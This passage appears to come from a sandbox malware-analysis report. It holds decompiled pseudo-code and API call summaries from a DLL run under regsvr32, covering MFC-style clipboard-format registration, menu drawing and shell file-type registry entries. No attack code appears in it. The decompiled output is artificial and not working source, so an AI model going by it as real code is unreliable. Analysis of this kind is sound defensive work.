                                                                                                                • RegisterClipboardFormatA.USER32(Native), ref: 1003BAAB
                                                                                                                • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1003BAB4
                                                                                                                • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1003BABE
                                                                                                                • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1003BAC8
                                                                                                                • RegisterClipboardFormatA.USER32(Embed Source), ref: 1003BAD2
                                                                                                                • RegisterClipboardFormatA.USER32(Link Source), ref: 1003BADC
                                                                                                                • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1003BAE6
                                                                                                                • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1003BAF0
                                                                                                                • RegisterClipboardFormatA.USER32(FileName), ref: 1003BAFA
                                                                                                                • RegisterClipboardFormatA.USER32(FileNameW), ref: 1003BB04
                                                                                                                • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1003BB0E
                                                                                                                • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1003BB18
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFormatRegister
                                                                                                                • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                • API String ID: 1228543026-2889995556
                                                                                                                • Opcode ID: b863bfad9a6418f9e2fd1412faae52298b95b30eeefb4627becfeae85f7cd8de
                                                                                                                • Instruction ID: d6250aa12c54189e2aaf52096f9617c6b42460172e35f872c6075af019b10c62
                                                                                                                • Opcode Fuzzy Hash: b863bfad9a6418f9e2fd1412faae52298b95b30eeefb4627becfeae85f7cd8de
                                                                                                                • Instruction Fuzzy Hash: 100135718007D4AACB30EF769D1888BBAE4EED53103524D3BF29997650E7749C41DF84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1001E751(void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				int _t177;
                                                                                                                				intOrPtr _t183;
                                                                                                                				int _t185;
                                                                                                                				long _t193;
                                                                                                                				intOrPtr* _t212;
                                                                                                                				RECT* _t214;
                                                                                                                				signed char _t218;
                                                                                                                				signed int _t229;
                                                                                                                				intOrPtr _t237;
                                                                                                                				long _t256;
                                                                                                                				long _t257;
                                                                                                                				long _t299;
                                                                                                                				long _t305;
                                                                                                                				CHAR* _t313;
                                                                                                                				signed char _t315;
                                                                                                                				char _t318;
                                                                                                                				intOrPtr _t329;
                                                                                                                				signed int _t340;
                                                                                                                				int _t364;
                                                                                                                				signed int _t366;
                                                                                                                				CHAR* _t369;
                                                                                                                				char _t370;
                                                                                                                				struct tagMENUITEMINFOA _t373;
                                                                                                                				intOrPtr* _t379;
                                                                                                                				struct tagRECT* _t380;
                                                                                                                
                                                                                                                				_t362 = __edx;
                                                                                                                				_push(0x58);
                                                                                                                				_t177 = E1004764D(0x1008f3b2, __ebx, __edi, __esi);
                                                                                                                				_t366 = __ecx;
                                                                                                                				 *(_t380 + 0x54) = __ecx;
                                                                                                                				_t313 =  *(_t380 + 0x60);
                                                                                                                				_t318 = _t313[0x2c];
                                                                                                                				 *(_t380 + 0x3c) = _t318;
                                                                                                                				if(_t318 == 0) {
                                                                                                                					L27:
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t380 - 0xc));
                                                                                                                					return _t177;
                                                                                                                				}
                                                                                                                				_t177 = E100203AA(_t318, 0x1009a248);
                                                                                                                				if(_t177 == 0) {
                                                                                                                					goto L27;
                                                                                                                				}
                                                                                                                				_t373 = 0x30;
                                                                                                                				E10049170(__ecx, _t380 - 0x3c, 0, _t373);
                                                                                                                				 *(_t380 - 0x3c) = _t373;
                                                                                                                				 *((intOrPtr*)(_t380 - 0x38)) = 0x40;
                                                                                                                				_t177 = GetMenuItemInfoA( *(_t366 + 4), _t313[8], 0, _t380 - 0x3c);
                                                                                                                				if(_t177 == 0) {
                                                                                                                					goto L27;
                                                                                                                				}
                                                                                                                				L1000140B(_t380 + 0x60, E100184C0());
                                                                                                                				 *(_t380 - 4) =  *(_t380 - 4) & 0x00000000;
                                                                                                                				_t183 = L100011F4(_t380 + 0x60,  *((intOrPtr*)(_t380 - 0x14)));
                                                                                                                				 *((intOrPtr*)(_t380 - 0x14)) =  *((intOrPtr*)(_t380 - 0x14)) + 1;
                                                                                                                				 *((intOrPtr*)(_t380 - 0x18)) = _t183;
                                                                                                                				_t185 = GetMenuItemInfoA( *(_t366 + 4), _t313[8], 0, _t380 - 0x3c);
                                                                                                                				E1000FED3(_t380 + 0x60, 0xffffffff);
                                                                                                                				_t390 = _t185;
                                                                                                                				if(_t185 == 0) {
                                                                                                                					L26:
                                                                                                                					_t177 = L100013E3( &(( *(_t380 + 0x60))[0xfffffffffffffff0]), _t362);
                                                                                                                					goto L27;
                                                                                                                				}
                                                                                                                				CopyRect(_t380,  &(_t313[0x1c]));
                                                                                                                				GetObjectA( *( *(_t380 + 0x3c) + 4), 0x18, _t380 - 0x64);
                                                                                                                				_t193 = GetSysColor(4);
                                                                                                                				_t328 = _t380->top;
                                                                                                                				 *(_t380 + 0x40) = _t193;
                                                                                                                				 *(_t380 + 0x44) =  *(_t380 + 0x44) & 0x00000000;
                                                                                                                				asm("cdq");
                                                                                                                				asm("cdq");
                                                                                                                				 *((intOrPtr*)(_t380 + 0x4c)) =  *((intOrPtr*)(_t380 - 0x60)) + 1;
                                                                                                                				_t329 = (_t380->bottom - _t380->top - _t362 >> 1) - ( *((intOrPtr*)(_t380 - 0x5c)) - _t362 >> 1) + _t328 - 1;
                                                                                                                				 *((intOrPtr*)(_t380 + 0x48)) = _t329;
                                                                                                                				 *((intOrPtr*)(_t380 + 0x50)) =  *((intOrPtr*)(_t380 - 0x5c)) + 1 + _t329;
                                                                                                                				_t379 = E1000CCCE(_t313, _t329, GetSysColor, (_t380->bottom - _t380->top - _t362 >> 1) - ( *((intOrPtr*)(_t380 - 0x5c)) - _t362 >> 1), _t390);
                                                                                                                				 *((intOrPtr*)(_t380 + 0x20)) =  *((intOrPtr*)( *_t379 + 0x1c))(_t313[0x18]);
                                                                                                                				 *((intOrPtr*)( *_t379 + 0x28))( *(_t380 + 0x54) + 8);
                                                                                                                				_t212 = E1001E5E1(_t379, _t380 + 0x34, _t380 + 0x60);
                                                                                                                				 *((intOrPtr*)(_t380 + 0x28)) =  *((intOrPtr*)(_t212 + 4));
                                                                                                                				 *((intOrPtr*)(_t380 + 0x24)) =  *_t212;
                                                                                                                				_t214 =  &(_t313[0x1c]);
                                                                                                                				if((_t313[0x10] & 0x00000001) == 0) {
                                                                                                                					E1001FBA9(_t379, _t214,  *(_t380 + 0x40));
                                                                                                                					 *((intOrPtr*)( *_t379 + 0x2c))( *(_t380 + 0x40));
                                                                                                                					_t218 = _t313[0x10];
                                                                                                                					__eflags = _t218 & 0x00000002;
                                                                                                                					if((_t218 & 0x00000002) == 0) {
                                                                                                                						__eflags = _t218 & 0x00000008;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							 *((intOrPtr*)(_t380 + 0x38)) =  *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48));
                                                                                                                							 *(_t380 + 0x54) =  *((intOrPtr*)(_t380 + 0x4c)) -  *(_t380 + 0x44);
                                                                                                                							_t256 = GetSysColor(0x14);
                                                                                                                							_t257 = GetSysColor(0x10);
                                                                                                                							__eflags =  *(_t380 + 0x54) + 1;
                                                                                                                							E10020163(_t379, __eflags,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x48)),  *(_t380 + 0x54) + 1,  *((intOrPtr*)(_t380 + 0x38)) + 1, _t257, _t256);
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)( *_t379 + 0x2c))( *(_t380 + 0x40));
                                                                                                                						 *((intOrPtr*)(_t380 + 0x38)) =  *_t379;
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x38)) + 0x30))(GetSysColor(7));
                                                                                                                						L16:
                                                                                                                						_t369 =  *(_t380 + 0x60);
                                                                                                                						asm("cdq");
                                                                                                                						_t340 =  *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48)) - _t362;
                                                                                                                						asm("cdq");
                                                                                                                						_push(0);
                                                                                                                						_t229 =  *((intOrPtr*)(_t380 + 0x28)) - _t362;
                                                                                                                						_t362 =  *((intOrPtr*)(_t369 - 0xc));
                                                                                                                						_push( *((intOrPtr*)(_t369 - 0xc)));
                                                                                                                						_push(_t369);
                                                                                                                						_push(0);
                                                                                                                						_push(2);
                                                                                                                						_push((_t340 >> 1) - (_t229 >> 1) +  *((intOrPtr*)(_t380 + 0x48)));
                                                                                                                						_push( *((intOrPtr*)(_t380 + 0x4c)) + 3);
                                                                                                                						_push( *(_t379 + 4));
                                                                                                                						L17:
                                                                                                                						ExtTextOutA();
                                                                                                                						 *(_t380 + 0x30) =  *(_t380 + 0x30) & 0x00000000;
                                                                                                                						 *(_t380 + 0x2c) = 0x10098d24;
                                                                                                                						_t315 = _t313[0x10];
                                                                                                                						_t396 = _t315 & 0x00000002;
                                                                                                                						 *(_t380 - 4) = 1;
                                                                                                                						if((_t315 & 0x00000002) == 0) {
                                                                                                                							__eflags = _t315 & 0x00000008;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t370 =  *(_t380 + 0x3c);
                                                                                                                							} else {
                                                                                                                								_push(0xffffff);
                                                                                                                								_push( *(_t380 + 0x40));
                                                                                                                								_push(_t380 + 0x2c);
                                                                                                                								_push( *(_t380 + 0x3c));
                                                                                                                								E1000DAF6(_t315, _t369, _t379, __eflags);
                                                                                                                								_t370 = _t380 + 0x2c;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_push( *(_t380 + 0x40));
                                                                                                                							_push(_t380 + 0x2c);
                                                                                                                							_push( *(_t380 + 0x3c));
                                                                                                                							E1000D64C(_t315, _t369, _t379, _t396);
                                                                                                                							_t370 = _t380 + 0x2c;
                                                                                                                						}
                                                                                                                						E1000C4AC(_t380 + 0x10);
                                                                                                                						 *(_t380 - 4) = 2;
                                                                                                                						E1000CCDC(_t380 + 0x10, _t370, _t380, CreateCompatibleDC(0));
                                                                                                                						if(_t370 != 0) {
                                                                                                                							_t237 =  *((intOrPtr*)(_t370 + 4));
                                                                                                                						} else {
                                                                                                                							_t237 = 0;
                                                                                                                						}
                                                                                                                						E1000D0A1( *((intOrPtr*)(_t380 + 0x14)), _t237);
                                                                                                                						InflateRect(_t380 + 0x44, 0xffffffff, 0xffffffff);
                                                                                                                						E1000C436(_t379,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x48)),  *((intOrPtr*)(_t380 + 0x4c)),  *((intOrPtr*)(_t380 + 0x50)), _t380 + 0x10, 0, 0, 0xcc0020);
                                                                                                                						 *((intOrPtr*)( *_t379 + 0x20))( *((intOrPtr*)(_t380 + 0x20)));
                                                                                                                						 *(_t380 - 4) = 1;
                                                                                                                						L1000CD56(_t380 + 0x10);
                                                                                                                						 *(_t380 - 4) = 0;
                                                                                                                						 *(_t380 + 0x2c) = 0x10098308;
                                                                                                                						L1000CFF6(_t380 + 0x2c);
                                                                                                                						goto L26;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t380 + 0x38)) =  *_t379;
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x38)) + 0x30))(GetSysColor(0x14));
                                                                                                                					E1000BD32(_t379, 1);
                                                                                                                					_t353 =  *((intOrPtr*)(_t380 + 0x48));
                                                                                                                					asm("cdq");
                                                                                                                					 *(_t380 + 0x54) =  *((intOrPtr*)(_t380 + 0x28)) - _t362;
                                                                                                                					 *(_t380 + 0x54) =  *(_t380 + 0x54) >> 1;
                                                                                                                					asm("cdq");
                                                                                                                					_t364 =  *( *(_t380 + 0x60) - 0xc);
                                                                                                                					_t99 = _t353 + 1; // 0x2
                                                                                                                					ExtTextOutA( *(_t379 + 4),  *((intOrPtr*)(_t380 + 0x4c)) + 4, ( *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48)) - _t362 >> 1) -  *(_t380 + 0x54) + _t99, 2, 0,  *(_t380 + 0x60), _t364, 0);
                                                                                                                					 *((intOrPtr*)(_t380 + 0x38)) =  *_t379;
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x38)) + 0x30))(GetSysColor(0x11));
                                                                                                                					_t369 =  *(_t380 + 0x60);
                                                                                                                					asm("cdq");
                                                                                                                					_push(0);
                                                                                                                					_t362 =  *((intOrPtr*)(_t369 - 0xc));
                                                                                                                					_push( *((intOrPtr*)(_t369 - 0xc)));
                                                                                                                					_push(_t369);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(( *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48)) - _t364 >> 1) -  *(_t380 + 0x54) +  *((intOrPtr*)(_t380 + 0x48)));
                                                                                                                					_push( *((intOrPtr*)(_t380 + 0x4c)) + 3);
                                                                                                                					_push( *(_t379 + 4));
                                                                                                                					goto L17;
                                                                                                                				}
                                                                                                                				CopyRect(_t380 - 0x4c, _t214);
                                                                                                                				 *(_t380 - 0x4c) =  *((intOrPtr*)(_t380 + 0x4c)) + 2;
                                                                                                                				E1001FBA9(_t379, _t380 - 0x4c, GetSysColor(0xd));
                                                                                                                				if((_t313[0x10] & 0x0000000a) == 0) {
                                                                                                                					 *(_t380 + 0x54) =  *((intOrPtr*)(_t380 + 0x50)) -  *((intOrPtr*)(_t380 + 0x48));
                                                                                                                					 *((intOrPtr*)(_t380 + 0x38)) =  *((intOrPtr*)(_t380 + 0x4c)) -  *(_t380 + 0x44);
                                                                                                                					_t305 = GetSysColor(0x10);
                                                                                                                					E10020163(_t379,  *((intOrPtr*)(_t380 + 0x38)) + 1,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x48)),  *((intOrPtr*)(_t380 + 0x38)) + 1,  *(_t380 + 0x54) + 1, GetSysColor(0x14), _t305);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t380 + 0x38)) =  *_t379;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x38)) + 0x2c))(GetSysColor(0xd));
                                                                                                                				if((_t313[0x10] & 0x00000002) == 0) {
                                                                                                                					_t299 = GetSysColor(0xe);
                                                                                                                				} else {
                                                                                                                					_t299 =  *(_t380 + 0x40);
                                                                                                                				}
                                                                                                                				_t362 =  *_t379;
                                                                                                                				 *((intOrPtr*)(_t362 + 0x30))(_t299);
                                                                                                                				goto L16;
                                                                                                                			}






























                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001E75C
                                                                                                                • _memset.LIBCMT ref: 1001E793
                                                                                                                • GetMenuItemInfoA.USER32 ref: 1001E7B8
                                                                                                                • GetMenuItemInfoA.USER32 ref: 1001E7F2
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                • CopyRect.USER32(?,?), ref: 1001E810
                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 1001E822
                                                                                                                • GetSysColor.USER32 ref: 1001E830
                                                                                                                  • Part of subcall function 1001E5E1: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 1001E5F6
                                                                                                                • CopyRect.USER32(?,?), ref: 1001E8B7
                                                                                                                • GetSysColor.USER32 ref: 1001E8F0
                                                                                                                • GetSysColor.USER32 ref: 1001E8F5
                                                                                                                • GetSysColor.USER32 ref: 1001E916
                                                                                                                • GetSysColor.USER32 ref: 1001E92E
                                                                                                                • GetSysColor.USER32 ref: 1001E8C8
                                                                                                                  • Part of subcall function 1001FBA9: SetBkColor.GDI32(?,00000000), ref: 1001FBCA
                                                                                                                  • Part of subcall function 1001FBA9: ExtTextOutA.GDI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 1001FBDE
                                                                                                                • GetSysColor.USER32 ref: 1001E964
                                                                                                                • ExtTextOutA.GDI32(?,?,00000002,00000002,00000000,?,?,00000000), ref: 1001E9B3
                                                                                                                • GetSysColor.USER32 ref: 1001E9C0
                                                                                                                • GetSysColor.USER32 ref: 1001EA12
                                                                                                                • GetSysColor.USER32 ref: 1001EA17
                                                                                                                • GetSysColor.USER32 ref: 1001EA42
                                                                                                                • ExtTextOutA.GDI32(?,?,?,00000002,00000000,?,?,00000000), ref: 1001EA80
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1001EAE3
                                                                                                                • InflateRect.USER32 ref: 1001EB0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Text$Rect$CopyInfoItemMenu$CompatibleCreateExtentH_prolog3InflateObjectPoint32_memset_strlen
                                                                                                                • String ID: @
                                                                                                                • API String ID: 508737835-2766056989
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E100281CE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t154;
                                                                                                                				void* _t175;
                                                                                                                				intOrPtr _t188;
                                                                                                                				intOrPtr _t191;
                                                                                                                				intOrPtr _t201;
                                                                                                                				char* _t204;
                                                                                                                				intOrPtr _t209;
                                                                                                                				intOrPtr _t213;
                                                                                                                				intOrPtr _t214;
                                                                                                                				intOrPtr _t217;
                                                                                                                				intOrPtr _t220;
                                                                                                                				intOrPtr _t228;
                                                                                                                				intOrPtr _t231;
                                                                                                                				intOrPtr _t234;
                                                                                                                				intOrPtr _t239;
                                                                                                                				void* _t250;
                                                                                                                				intOrPtr _t257;
                                                                                                                				intOrPtr _t258;
                                                                                                                				void* _t286;
                                                                                                                				void* _t287;
                                                                                                                				void* _t304;
                                                                                                                				long _t337;
                                                                                                                				intOrPtr _t338;
                                                                                                                				char* _t339;
                                                                                                                				void* _t340;
                                                                                                                				void* _t342;
                                                                                                                				intOrPtr _t343;
                                                                                                                				intOrPtr _t344;
                                                                                                                				char* _t345;
                                                                                                                				struct HICON__* _t346;
                                                                                                                				void* _t348;
                                                                                                                				void* _t349;
                                                                                                                				void* _t350;
                                                                                                                				intOrPtr _t352;
                                                                                                                
                                                                                                                				_t350 = __eflags;
                                                                                                                				_t335 = __edx;
                                                                                                                				_push(0x3c);
                                                                                                                				E1004764D(0x1008fd53, __ebx, __edi, __esi);
                                                                                                                				_t342 = __ecx;
                                                                                                                				L1000140B(_t348 - 0x2c, E100184C0());
                                                                                                                				 *(_t348 - 4) =  *(_t348 - 4) & 0x00000000;
                                                                                                                				L1000140B(_t348 - 0x14, E100184C0());
                                                                                                                				 *(_t348 - 4) = 1;
                                                                                                                				E10029AB3(__ebx, __edx,  *((intOrPtr*)(E1001E302(__ebx, __edi, __ecx, _t350) + 8)), _t348 - 0x2c);
                                                                                                                				_t154 =  *((intOrPtr*)(_t342 + 8));
                                                                                                                				 *((intOrPtr*)(_t348 - 0x3c)) = _t154;
                                                                                                                				 *(_t348 - 0x30) = 1;
                                                                                                                				if(_t154 == 0) {
                                                                                                                					L45:
                                                                                                                					L100013E3( *((intOrPtr*)(_t348 - 0x14)) + 0xfffffff0, _t335);
                                                                                                                					return E10047725(L100013E3( &(( *(_t348 - 0x2c))[0xfffffffffffffff0]), _t335));
                                                                                                                				} else {
                                                                                                                					_t343 = _t342 + 4;
                                                                                                                					_t352 = _t343;
                                                                                                                					 *((intOrPtr*)(_t348 - 0x40)) = _t343;
                                                                                                                					do {
                                                                                                                						_t337 =  *(E10012115(_t348 - 0x3c));
                                                                                                                						 *(_t348 - 0x44) = _t337;
                                                                                                                						L100010F5(_t348 - 0x24, _t352, _t348 - 0x2c);
                                                                                                                						 *(_t348 - 4) = 2;
                                                                                                                						L100010F5(_t348 - 0x28, _t352, _t348 - 0x2c);
                                                                                                                						 *(_t348 - 4) = 3;
                                                                                                                						L100010F5(_t348 - 0x20, _t352, _t348 - 0x2c);
                                                                                                                						 *(_t348 - 4) = 4;
                                                                                                                						L100010F5(_t348 - 0x38, _t352, _t348 - 0x2c);
                                                                                                                						_t257 =  *((intOrPtr*)(_t348 + 8));
                                                                                                                						_t353 = _t257;
                                                                                                                						 *(_t348 - 4) = 5;
                                                                                                                						if(_t257 != 0) {
                                                                                                                							L1000140B(_t348 - 0x34, E100184C0());
                                                                                                                							_t345 =  *(_t348 - 0x2c);
                                                                                                                							 *(_t348 - 4) = 6;
                                                                                                                							_t346 = ExtractIconA( *(E1001E302(_t257, _t337, _t345, _t353) + 8), _t345,  *(_t348 - 0x30));
                                                                                                                							_t250 = _t348 - 0x34;
                                                                                                                							if(_t346 == 0) {
                                                                                                                								L1000106E(_t250, ",%d", 0);
                                                                                                                								_t349 = _t349 + 0xc;
                                                                                                                							} else {
                                                                                                                								L1000106E(_t250, ",%d",  *(_t348 - 0x30));
                                                                                                                								_t349 = _t349 + 0xc;
                                                                                                                								DestroyIcon(_t346);
                                                                                                                							}
                                                                                                                							L1000AFA8(_t348 - 0x38,  *((intOrPtr*)(_t348 - 0x34)),  *((intOrPtr*)( *((intOrPtr*)(_t348 - 0x34)) - 0xc)));
                                                                                                                							 *(_t348 - 4) = 5;
                                                                                                                							L100013E3( *((intOrPtr*)(_t348 - 0x34)) - 0x10, _t335);
                                                                                                                						}
                                                                                                                						L1000140B(_t348 - 0x18, E100184C0());
                                                                                                                						 *(_t348 - 4) = 7;
                                                                                                                						L1000140B(_t348 - 0x10, E100184C0());
                                                                                                                						 *(_t348 - 4) = 8;
                                                                                                                						L1000140B(_t348 - 0x1c, E100184C0());
                                                                                                                						 *(_t348 - 4) = 9;
                                                                                                                						_t175 =  *((intOrPtr*)( *_t337 + 0x64))(_t348 - 0x10, 5);
                                                                                                                						_t344 =  *((intOrPtr*)(_t348 - 0x38));
                                                                                                                						if(_t175 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t348 - 0x10)) - 0xc)) == 0) {
                                                                                                                							_t338 =  *((intOrPtr*)(_t348 - 0x24));
                                                                                                                							_t258 =  *((intOrPtr*)(_t348 - 0x28));
                                                                                                                							goto L42;
                                                                                                                						} else {
                                                                                                                							_push(6);
                                                                                                                							_push(_t348 - 0x1c);
                                                                                                                							if( *((intOrPtr*)( *_t337 + 0x64))() == 0) {
                                                                                                                								E10018A1F(_t257, _t348 - 0x1c, _t348, _t348 - 0x10);
                                                                                                                							}
                                                                                                                							if(E10027494( *((intOrPtr*)(_t348 - 0x10)),  *((intOrPtr*)(_t348 - 0x1c)), 0) != 0) {
                                                                                                                								__eflags = _t257;
                                                                                                                								if(_t257 == 0) {
                                                                                                                									L17:
                                                                                                                									_t188 =  *((intOrPtr*)( *_t337 + 0x64))(_t348 - 0x14, 0);
                                                                                                                									__eflags = _t188;
                                                                                                                									if(_t188 == 0) {
                                                                                                                										L22:
                                                                                                                										_t339 = "ddeexec";
                                                                                                                										_push(_t339);
                                                                                                                										L1000106E(_t348 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                										_t349 = _t349 + 0x10;
                                                                                                                										_t191 = E10027494( *((intOrPtr*)(_t348 - 0x14)), "[open(\"%1\")]", 0);
                                                                                                                										__eflags = _t191;
                                                                                                                										if(_t191 == 0) {
                                                                                                                											L16:
                                                                                                                											L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
                                                                                                                											L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
                                                                                                                											L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
                                                                                                                											_t298 = _t344 - 0x10;
                                                                                                                											goto L13;
                                                                                                                										}
                                                                                                                										__eflags = _t257;
                                                                                                                										if(_t257 == 0) {
                                                                                                                											_push(" \"%1\"");
                                                                                                                											_t304 = _t348 - 0x24;
                                                                                                                											L28:
                                                                                                                											E1000B029(_t304);
                                                                                                                											L29:
                                                                                                                											_push("command");
                                                                                                                											L1000106E(_t348 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                											_t338 =  *((intOrPtr*)(_t348 - 0x24));
                                                                                                                											_t349 = _t349 + 0x10;
                                                                                                                											_t201 = E10027494( *((intOrPtr*)(_t348 - 0x14)), _t338, 0);
                                                                                                                											__eflags = _t201;
                                                                                                                											if(_t201 != 0) {
                                                                                                                												__eflags = _t257;
                                                                                                                												_t258 =  *((intOrPtr*)(_t348 - 0x28));
                                                                                                                												if(_t257 == 0) {
                                                                                                                													L34:
                                                                                                                													_t335 = _t348 - 0x18;
                                                                                                                													 *((intOrPtr*)( *( *(_t348 - 0x44)) + 0x64))(_t348 - 0x18, 4);
                                                                                                                													_t204 =  *(_t348 - 0x18);
                                                                                                                													__eflags =  *((intOrPtr*)(_t204 - 0xc));
                                                                                                                													if( *((intOrPtr*)(_t204 - 0xc)) == 0) {
                                                                                                                														L42:
                                                                                                                														L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
                                                                                                                														L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
                                                                                                                														L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
                                                                                                                														L100013E3(_t344 - 0x10, _t335);
                                                                                                                														__eflags =  *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0;
                                                                                                                														L100013E3( *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0, _t335);
                                                                                                                														_t286 = _t258 - 0x10;
                                                                                                                														L43:
                                                                                                                														L100013E3(_t286, _t335);
                                                                                                                														_t287 = _t338 - 0x10;
                                                                                                                														goto L44;
                                                                                                                													}
                                                                                                                													 *(_t348 - 0x44) = 0x208;
                                                                                                                													 *((intOrPtr*)(_t348 - 0x48)) = RegQueryValueA(0x80000000,  *(_t348 - 0x18), L100011F4(_t348 - 0x14, 0x208), _t348 - 0x44);
                                                                                                                													E1000FED3(_t348 - 0x14, 0xffffffff);
                                                                                                                													__eflags =  *((intOrPtr*)(_t348 - 0x48));
                                                                                                                													if( *((intOrPtr*)(_t348 - 0x48)) != 0) {
                                                                                                                														L38:
                                                                                                                														_t209 = E10027494( *(_t348 - 0x18),  *((intOrPtr*)(_t348 - 0x10)), 0);
                                                                                                                														__eflags = _t209;
                                                                                                                														if(_t209 != 0) {
                                                                                                                															__eflags =  *((intOrPtr*)(_t348 + 8));
                                                                                                                															if( *((intOrPtr*)(_t348 + 8)) != 0) {
                                                                                                                																L1000106E(_t348 - 0x14, "%s\\ShellNew",  *(_t348 - 0x18));
                                                                                                                																_t349 = _t349 + 0xc;
                                                                                                                																E10027494( *((intOrPtr*)(_t348 - 0x14)), 0x1009d925, "NullFile");
                                                                                                                															}
                                                                                                                														}
                                                                                                                														goto L42;
                                                                                                                													}
                                                                                                                													_t213 =  *((intOrPtr*)(_t348 - 0x14));
                                                                                                                													__eflags =  *((intOrPtr*)(_t213 - 0xc));
                                                                                                                													if( *((intOrPtr*)(_t213 - 0xc)) == 0) {
                                                                                                                														goto L38;
                                                                                                                													}
                                                                                                                													_t214 = E1001BBE2(_t258, _t348 - 0x14, _t335, _t338, _t344, _t348,  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                													__eflags = _t214;
                                                                                                                													if(_t214 != 0) {
                                                                                                                														goto L42;
                                                                                                                													}
                                                                                                                													goto L38;
                                                                                                                												}
                                                                                                                												_push("command");
                                                                                                                												L1000106E(_t348 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                												_t349 = _t349 + 0x10;
                                                                                                                												_t217 = E10027494( *((intOrPtr*)(_t348 - 0x14)), _t258, 0);
                                                                                                                												__eflags = _t217;
                                                                                                                												if(_t217 == 0) {
                                                                                                                													goto L42;
                                                                                                                												}
                                                                                                                												_push("command");
